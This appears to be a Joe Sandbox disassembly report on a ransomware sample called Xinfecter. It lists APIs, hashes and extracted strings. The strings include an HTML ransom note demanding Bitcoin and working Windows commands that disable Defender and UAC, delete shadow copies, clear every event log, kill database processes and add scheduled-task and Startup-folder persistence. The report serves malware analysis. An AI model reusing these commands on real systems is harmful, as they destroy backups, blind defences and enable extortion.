                                      • String ID: If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $If You Want To Restore Them Email Us : $To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp$ ",$ /f$ ::$ <span class="spnn">$ ="$" start= auto$" start=auto$", $","$"cmd.exe","$"disaust",$"ren_end",$.1UI$.txt$77H75$:: $:\Documents and Settings\$:\Users\$:\Windows\SysMain.sys$</span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $</span></br></br>If You Want To Restore Them Email Us : <span class="spnn">$</span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The $</title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou$<html><head><title>$=" $All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without $Dflt$Dflt$Lpath$Second Email :$Telegram , ID :$Version 5.$X$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe$\AppData\SysMain.sys$\Start Menu\Programs\Startup\Xinfecter.exe$_Mail-$_[ID-$alterencsz="$alterencsz="",$asykat$asykat$c$c$c:\R_cfg.ini$c:\skips.txt$c_drive="$c_drive=""$c_end$dcdcf$dismx$emptyString$file$for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"$fpath="$fpath=""$h2gq$invalid stod argument$k2ba8v$mode="$mode="",$mode="fast",$mode="slow",$n7t0$nodisk$noshare$p2h6$r1d8la$reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic$sc create SqlBakup binPath= "$skip_path="$skip_path=""$spath$spath="$spath=""$stod argument out of range$taskkill /PID $taskkill /im msftesql.exe&taskkill 
/im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk$tasklist /v /fo csv | findstr /i "dcdcf"$thd_per_drv="$thd_per_drv=""$total_thd="$total_thd=""$u4g8$ver
                                      • API String ID: 0-3497711092
                                      • Opcode ID: 26367c3043a6df633643a32f01cb37bbc408008916b8b53f7dea2a3ad82f290e
                                      • Instruction ID: 239223329abedc3ee9309d629f0fb44df3a89624e2a3f47f294104d1fa27a58c
                                      • Opcode Fuzzy Hash: 26367c3043a6df633643a32f01cb37bbc408008916b8b53f7dea2a3ad82f290e
                                      • Instruction Fuzzy Hash: 30D3F430E10258DBDF14DB68CD46BDDBBB1FF85314F508299E409E7292EB749A84CB92

                                      Control-flow Graph

                                      APIs
                                      • GetConsoleWindow.KERNEL32 ref: 008DC989
                                      • ShowWindow.USER32(00000000,00000000), ref: 008DC992
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Window$ConsoleShow
                                      • String ID: If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $If You Want To Restore Them Email Us : $To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp$ <span class="spnn">$" start= auto$" start=auto$.1UI$77H75$:\Documents and Settings\$:\Users\$:\Windows\SysMain.sys$</span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $</span></br></br>If You Want To Restore Them Email Us : <span class="spnn">$</span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The $</title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou$<html><head><title>$All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without $Dflt$Fast$Fast$Lpath$Manual_Mini_Config$Mini_Config$Normal_Config$Second Email :$Version 5.$\AppData\N-Save.sys$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe$\Start Menu\Programs\Startup\Xinfecter.exe$c$dcdcf$file$for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"$h2gq$n7t0$p2h6$reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic$sc create SqlBakup binPath= "$spath$taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk$tasklist /v /fo csv | findstr /i "dcdcf"$u4g8$ver$Z0
                                      • API String ID: 3999960783-3856679227
                                      • Opcode ID: 8083070f9229ee887b20fe998cd845dd3e1925351bb31d714d307ef6789d4cc7
                                      • Instruction ID: 47cd3d6a2820e8769c62181dcc9b6234e832cc0b318a02f6dab5582969495034
                                      • Opcode Fuzzy Hash: 8083070f9229ee887b20fe998cd845dd3e1925351bb31d714d307ef6789d4cc7
                                      • Instruction Fuzzy Hash: 2AD2AF70D00298AADB24F768CD56BDD77A4FB52344F4081E9A449A72D2EF706F48CB93

                                      Control-flow Graph

                                      APIs
                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 008B9A98
                                        • Part of subcall function 0096251C: DeleteFileW.KERNEL32(?,?,008B9938,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00962524
                                        • Part of subcall function 0096251C: GetLastError.KERNEL32(?,008B9938,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020), ref: 0096252E
                                        • Part of subcall function 0096251C: __dosmaperr.LIBCMT ref: 00962535
                                      Strings
                                      • schtasks /delete /tn Microsoft_Auto_Scheduler /fIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (DEL "%SystemDr, xrefs: 008BA831
                                      • \AppData\S-6748.bat, xrefs: 008B95BD
                                      • rem a5m6f, xrefs: 008B9BEB
                                      • ">NULif "%ERRORLEVEL%"=="0" goto imerif %lend% == bed (goto akakak)set lend=bedIF EXIST , xrefs: 008B9D99
                                      • "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\, xrefs: 008B9AAF
                                      • :\Users\ReadMe.hta", xrefs: 008B9B2B
                                      • rem, xrefs: 008B9354
                                      • )IF NOT EXIST , xrefs: 008BA3D5
                                      • \AppData\S-8459.vbs, xrefs: 008BAA51
                                      • Xinfecter.exe" (IF EXIST ", xrefs: 008BA485
                                      • "%SystemDrive%\Documents and Settings\%username%\Start Menu\Programs\Startup\, xrefs: 008B9B04
                                      • ">NULif "%ERRORLEVEL%"=="0" goto notendgoto secton:notendtimeout /t 15 /nobreak >NULIF NOT EXIST , xrefs: 008BA109
                                      • @echo offIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (start "" "%SystemDrive%\Users\%username%\AppData\S-8459.vbs"), xrefs: 008BAB3A
                                      • @echo offtasklist /v | find /I /c "dcdcf" > nulif "%ERRORLEVEL%" == "0" goto ErrorAlreadyRunningset lend=debvssadmin.exe D, xrefs: 008B9CD7
                                      • l, xrefs: 008BAB79
                                      • (goto secthree):akakak, xrefs: 008BA803
                                      • slow, xrefs: 008B93A4
                                      • Xinfecter.exe" (start /d , xrefs: 008B9E53, 008BA275
                                      • schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f, xrefs: 008BABB2
                                      • Dim strScriptDim oExec, oWshShellDim ComSpecSet oWshShell = CreateObject("WScript.Shell")ComSpec = oWshShell.ExpandEnvironmentStrings("%comspec%")strScript = ComSpec & " /C echo %SystemDrive%\Users\%username%\AppData\S-6748.bat"Set oExec = oWshShel, xrefs: 008BAA84
                                      • a5m6f, xrefs: 008B9882, 008B98A5
                                      • ):secttwotasklist /fi "ImageName eq , xrefs: 008B9FA9
                                      • kaj3n, xrefs: 008B98C5, 008B9C01
                                      • :\Users\, xrefs: 008B954B, 008BAA27, 008BAADD
                                      • (start /d , xrefs: 008BA589
                                      • (goto secttwo:sectonIF EXIST , xrefs: 008BA1C5
                                      • " /fo csv 2>NUL | find /I ", xrefs: 008B9CED, 008BA059
                                      • " Xinfecter.exe , xrefs: 008B9EF9, 008BA329
                                      • Xinfecter.exe, xrefs: 008B96E6, 008B9BC6
                                      • cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat, xrefs: 008BAB93
                                      • \AppData\S-2153.bat, xrefs: 008BAB07
                                      • ))goto notend):imertimeout /t 90 /nobreak >NULIF EXIST , xrefs: 008BA7D1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: DeleteErrorFileIos_base_dtorLast__dosmaperrstd::ios_base::_
                                      • String ID: ))goto notend):imertimeout /t 90 /nobreak >NULIF EXIST $):secttwotasklist /fi "ImageName eq $)IF NOT EXIST $schtasks /delete /tn Microsoft_Auto_Scheduler /fIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (DEL "%SystemDr$ (goto secthree):akakak$ (goto secttwo:sectonIF EXIST $ (start /d $" /fo csv 2>NUL | find /I "$" Xinfecter.exe $"%SystemDrive%\Documents and Settings\%username%\Start Menu\Programs\Startup\$"%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$">NULif "%ERRORLEVEL%"=="0" goto imerif %lend% == bed (goto akakak)set lend=bedIF EXIST $">NULif "%ERRORLEVEL%"=="0" goto notendgoto secton:notendtimeout /t 15 /nobreak >NULIF NOT EXIST $:\Users\$:\Users\ReadMe.hta"$@echo offIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (start "" "%SystemDrive%\Users\%username%\AppData\S-8459.vbs")$@echo offtasklist /v | find /I /c "dcdcf" > nulif "%ERRORLEVEL%" == "0" goto ErrorAlreadyRunningset lend=debvssadmin.exe D$Dim strScriptDim oExec, oWshShellDim ComSpecSet oWshShell = CreateObject("WScript.Shell")ComSpec = oWshShell.ExpandEnvironmentStrings("%comspec%")strScript = ComSpec & " /C echo %SystemDrive%\Users\%username%\AppData\S-6748.bat"Set oExec = oWshShel$Xinfecter.exe$Xinfecter.exe" (IF EXIST "$Xinfecter.exe" (start /d $\AppData\S-2153.bat$\AppData\S-6748.bat$\AppData\S-8459.vbs$a5m6f$cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat$kaj3n$l$rem$rem a5m6f$schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f$slow
                                      • API String ID: 969238624-3584783570
                                      • Opcode ID: 75078c94f373e0e53e2798fa14d0e0085ad7a62e45f9fee4e550c2c7f7b6bf0f
                                      • Instruction ID: 0fa943991d5d6e96a9bed7fedf3e345315e0517949616d5b67c71eee263b2a78
                                      • Opcode Fuzzy Hash: 75078c94f373e0e53e2798fa14d0e0085ad7a62e45f9fee4e550c2c7f7b6bf0f
                                      • Instruction Fuzzy Hash: 7CF24770D04658CADB14DF68CD55BEEBBB0FF55308F0042D9E509A72A2EB74AA88CF51

                                      Control-flow Graph (graph image not reproduced)
                                      APIs
                                        • Part of subcall function 008BB0A0: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 008BB147
                                        • Part of subcall function 008BAE70: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 008BAEE1
                                      • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 008DE06E
                                        • Part of subcall function 009661D6: MoveFileExW.KERNEL32(?,?,00000002), ref: 009661E3
                                        • Part of subcall function 009661D6: GetLastError.KERNEL32 ref: 009661ED
                                        • Part of subcall function 009661D6: __dosmaperr.LIBCMT ref: 009661F4
                                      Strings
                                      • _Mail-, xrefs: 008DE3C7
                                      • Telegram , ID :, xrefs: 008DE063
                                      • <span class="spnn">, xrefs: 008DE123
                                      • Dflt, xrefs: 008DE36D
                                      • file, xrefs: 008DE368
                                      • u4g8, xrefs: 008DDD11
                                      • for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1", xrefs: 008DEC74
                                      • 77H75, xrefs: 008DE0A4, 008DE238, 008DE3AE
                                      • c, xrefs: 008DE4D9
                                      • n7t0, xrefs: 008DDB76, 008DDC3E
                                      • c, xrefs: 008DE35F
                                      • All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without , xrefs: 008DE23D
                                      • U, xrefs: 008DDEB8
                                      • </span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our , xrefs: 008DE0EF
                                      • </title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou, xrefs: 008DE08B
                                      • .1UI, xrefs: 008DDCB5, 008DDCC2, 008DE412
                                      • _[ID-, xrefs: 008DE396
                                      • <html><head><title>, xrefs: 008DE078
                                      • To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp, xrefs: 008DE2EC
                                      • Z0, xrefs: 008DD9A1
                                      • :\Users\, xrefs: 008DDDBD
                                      • If You Do Not Receive A Response Within 24 Hours, Send A Message To Our , xrefs: 008DE282
                                      • If You Want To Restore Them Email Us : , xrefs: 008DE250
                                      • taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk, xrefs: 008DE219
                                      • Second Email :, xrefs: 008DE039
                                      • </span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The , xrefs: 008DE155
                                      • p2h6, xrefs: 008DDB89, 008DDC51
                                      • \AppData\N-Save.sys, xrefs: 008DDDF2
                                      • </span></br></br>If You Want To Restore Them Email Us : <span class="spnn">, xrefs: 008DE0BD
                                      • reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic, xrefs: 008DE1EB
                                      • h2gq, xrefs: 008DDD4E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Ios_base_dtorstd::ios_base::_$ErrorFileLastMoveSimpleString::operator=__dosmaperr
                                      • String ID: If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $If You Want To Restore Them Email Us : $To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp$ <span class="spnn">$.1UI$77H75$:\Users\$</span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $</span></br></br>If You Want To Restore Them Email Us : <span class="spnn">$</span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The $</title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou$<html><head><title>$All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without $Dflt$Second Email :$Telegram , ID :$U$\AppData\N-Save.sys$_Mail-$_[ID-$c$c$file$for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"$h2gq$n7t0$p2h6$reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic$taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk$u4g8$Z0
                                      • API String ID: 4082941153-1248798851
                                      • Opcode ID: bfde7d9006ff46d160e4adf6b80b796820c6a8af1516d7b331582a9a5fdc09ce
                                      • Instruction ID: 8b1973052468d9b2dcc61a65fa0d8f337367d212376671eb3b3d04a8e9da4cf1
                                      • Opcode Fuzzy Hash: bfde7d9006ff46d160e4adf6b80b796820c6a8af1516d7b331582a9a5fdc09ce
                                      • Instruction Fuzzy Hash: 91728470D142989ADB14E768DD56BEDB7B8FF51304F4080E8A149A7292EF706F88CB53

                                      Control-flow Graph (graph image not reproduced)
                                      APIs
                                      • std::locale::_Init.LIBCPMT ref: 008B8D8C
                                        • Part of subcall function 009291F6: __EH_prolog3.LIBCMT ref: 009291FD
                                        • Part of subcall function 009291F6: std::_Lockit::_Lockit.LIBCPMT ref: 00929208
                                        • Part of subcall function 009291F6: std::locale::_Setgloballocale.LIBCPMT ref: 00929223
                                        • Part of subcall function 009291F6: std::_Lockit::~_Lockit.LIBCPMT ref: 00929279
                                      • WSAStartup.WS2_32(00000202,?), ref: 008B903A
                                      • socket.WS2_32(00000002,00000001,00000006), ref: 008B905A
                                      • gethostbyname.WS2_32(?), ref: 008B9072
                                      • htons.WS2_32(00000E02), ref: 008B907F
                                      • connect.WS2_32(?,?,00000010), ref: 008B90B4
                                      • send.WS2_32(?,?,?,00000000), ref: 008B9119
                                      • recv.WS2_32(?,?,00002710,00000000), ref: 008B9144
                                      • recv.WS2_32(?,?,00002710,00000000), ref: 008B91C3
                                      • closesocket.WS2_32(?), ref: 008B91CE
                                      • WSACleanup.WS2_32 ref: 008B91D4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Lockitrecvstd::_std::locale::_$CleanupH_prolog3InitLockit::_Lockit::~_SetgloballocaleStartupclosesocketconnectgethostbynamehtonssendsocket
                                      • String ID: Connection: close$ HTTP/1.1Host: $GET /$off
                                      • API String ID: 928259667-845956351
                                      • Opcode ID: 78ec4f81f94459327d6650d5cb2ddba421b12cf3133451cabf9978eaf08f660c
                                      • Instruction ID: 3b34b4f34920b18cf5b26752915ce23df35df9bcd7cb1dbece73cb3158322067
                                      • Opcode Fuzzy Hash: 78ec4f81f94459327d6650d5cb2ddba421b12cf3133451cabf9978eaf08f660c
                                      • Instruction Fuzzy Hash: 2AF1BE30A052599BEB29CF28CD48BADBBB5FF45304F0081D9E548AB392DB759BC48F51
                                      APIs
                                      • GetWindowTextLengthA.USER32(?), ref: 008C5AD7
                                      • GetWindowTextA.USER32(?,00000000,00000001), ref: 008C5BA9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: TextWindow$Length
                                      • String ID: !$P$asykat$asykat$k2ba8v$r1d8la
                                      • API String ID: 1006428111-138844214
                                      • Opcode ID: d2e18e2df9870bd1eb304f8b4e98da0ae13ae4719c48a352dae662c699996051
                                      • Instruction ID: e602a3f3c8c8fa6887da75e5a49ec2b88545185e5983ea8178b2528ccb83e3c2
                                      • Opcode Fuzzy Hash: d2e18e2df9870bd1eb304f8b4e98da0ae13ae4719c48a352dae662c699996051
                                      • Instruction Fuzzy Hash: 6DA2AF70A106589BEF24DF68CC95BADBBB1FB85304F10829DE409E7291DB74AAC4CF51

                                      Control-flow Graph (graph image not reproduced)
                                      APIs
                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,BA3649C5,009D9528,?,00000000), ref: 00914A75
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,0098D0C8,000000FF,?,00915170), ref: 00914A7B
                                      • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 00914A8F
                                      • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 00914AA0
                                      • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,0098D0C8,000000FF), ref: 00914AC5
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00914AF4
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00914B42
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: AcquireContextCrypt$ErrorLast$Exception@8Throw___std_exception_copy
                                      • String ID: CryptAcquireContext$Crypto++ RNG
                                      • API String ID: 636621833-1159690233
                                      • Opcode ID: 6a100d52a251a2b5164faf5f25d5ca36b26edd10bbea4627a7c55b2a07d7872e
                                      • Instruction ID: 449d0653246eac965026e7f1b33a91084158aa0d251c8ae6785128ebdef78292
                                      • Opcode Fuzzy Hash: 6a100d52a251a2b5164faf5f25d5ca36b26edd10bbea4627a7c55b2a07d7872e
                                      • Instruction Fuzzy Hash: 60417171A54709ABDB10DF99DC41F9AB7ECFB48710F10462AF515E7280EBB4A5048B64
                                      APIs
                                      • NetUserEnum.NETAPI32(00000000,00000000,00000002,00000000,000000FF,00000000,?,?,BA3649C5), ref: 008C4D25
                                      • NetApiBufferFree.NETAPI32(00000000), ref: 008C4DC6
                                      • NetApiBufferFree.NETAPI32(00000000), ref: 008C4DE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: BufferFree$EnumUser
                                      • String ID: Default
                                      • API String ID: 2592758740-753088835
                                      • Opcode ID: 211a1539bba17f921c27b51855768cf828580b4911b397bcb4768f0b611a0dba
                                      • Instruction ID: 6d91931ff8eb55107ca84668768c4fe6b1527badfccaeb96237801954068f7a7
                                      • Opcode Fuzzy Hash: 211a1539bba17f921c27b51855768cf828580b4911b397bcb4768f0b611a0dba
                                      • Instruction Fuzzy Hash: FE416F75D142099BCB14DF98D894FEEBBB8FB48314F14522EE912A7290D735AA44CB90
                                      APIs
                                      • CryptGenRandom.ADVAPI32(00000000,?,00000000,00000001), ref: 00915180
                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0091519F
                                        • Part of subcall function 00914B90: GetLastError.KERNEL32(00000010,BA3649C5,75B4FC30,?), ref: 00914BE0
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0091520A
                                        • Part of subcall function 00958621: RaiseException.KERNEL32(?,?,00925B8C,?,?,Dflt,?,?,?,?,?,00925B8C,?,009C9A70,?), ref: 00958681
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
